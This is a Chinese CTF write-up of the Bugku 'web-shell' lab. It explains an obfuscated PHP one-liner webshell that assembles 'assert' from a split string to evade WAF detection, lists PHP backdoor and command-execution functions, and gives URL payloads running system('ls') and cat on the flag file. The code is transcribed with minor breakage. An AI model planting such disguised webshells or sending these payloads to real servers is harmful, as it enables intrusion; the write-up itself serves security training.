bugku-web-shell

打开环境

什么都没有

提示:

送给大家一个过狗一句话

$poc="a#s#s#e#r#t";

poc_1=explode("#",poc);

poc_2=poc_10.poc_1\[1\].poc_12.poc_1\[3\].poc_14.poc_1\[5\]; poc_2($_GET's')

explode():把字符串打散为数组(php内置函数

$poc_2 = 'assert';

php特性:变量名 加 括号()=当函数来执行

$poc_2 = "assert";

$poc_2( 内容 ); → 等价于 assert( 内容 );

最常见的「后门函数」

PHP 里专门执行系统命令的函数

  • assert()
  • eval()
  • system()
  • exec()
  • shell_exec()
  • passthru()
  • include / require
  • system()
  • exec()
  • shell_exec()

url?s=system('ls')

如果是windows服务器要用dir

url?s=system('cat flaga15808abee46a1d5.txt')

相关推荐
print_Hyon5 天前
【CTF-MISC-音频和视频】分析音频频谱,提取图片中的文件并尝试解码得到rar文件
ctf
print_Hyon5 天前
【CTF-MISC-盲水印】压缩包8字节反转+bkcarck破解压缩包+双图盲水印
ctf
福来阁86号技师5 天前
2026-now 网络安全笔记
网络安全·ctf·awd
print_Hyon6 天前
【CTF-MISC-压缩包】bkcrake通过已知明文文件攻击来破解加密的压缩包
ctf
祁白_1 个月前
PHP回调函数
web安全·php·ctf·代码审计·writeup
Eileen Seligman1 个月前
0CTF/TCTF 2023 OLAPInfra Nashorn RCE + HDFS UDF RCE
大数据·hadoop·hdfs·ctf·rce
qsuperm1 个月前
LitCTF2026WEB
网络安全·ctf
路baby1 个月前
2026第十届御网杯网络安全大赛线上赛 区域赛WP (MISC和Crypto)(详解-思路-脚本)
安全·web安全·网络安全·密码学·ctf·misc·御网杯
沄媪2 个月前
CSRF 跨站请求伪造
前端·ctf·csrf
沄媪2 个月前
XSS 跨站脚本攻击
前端·ctf·xss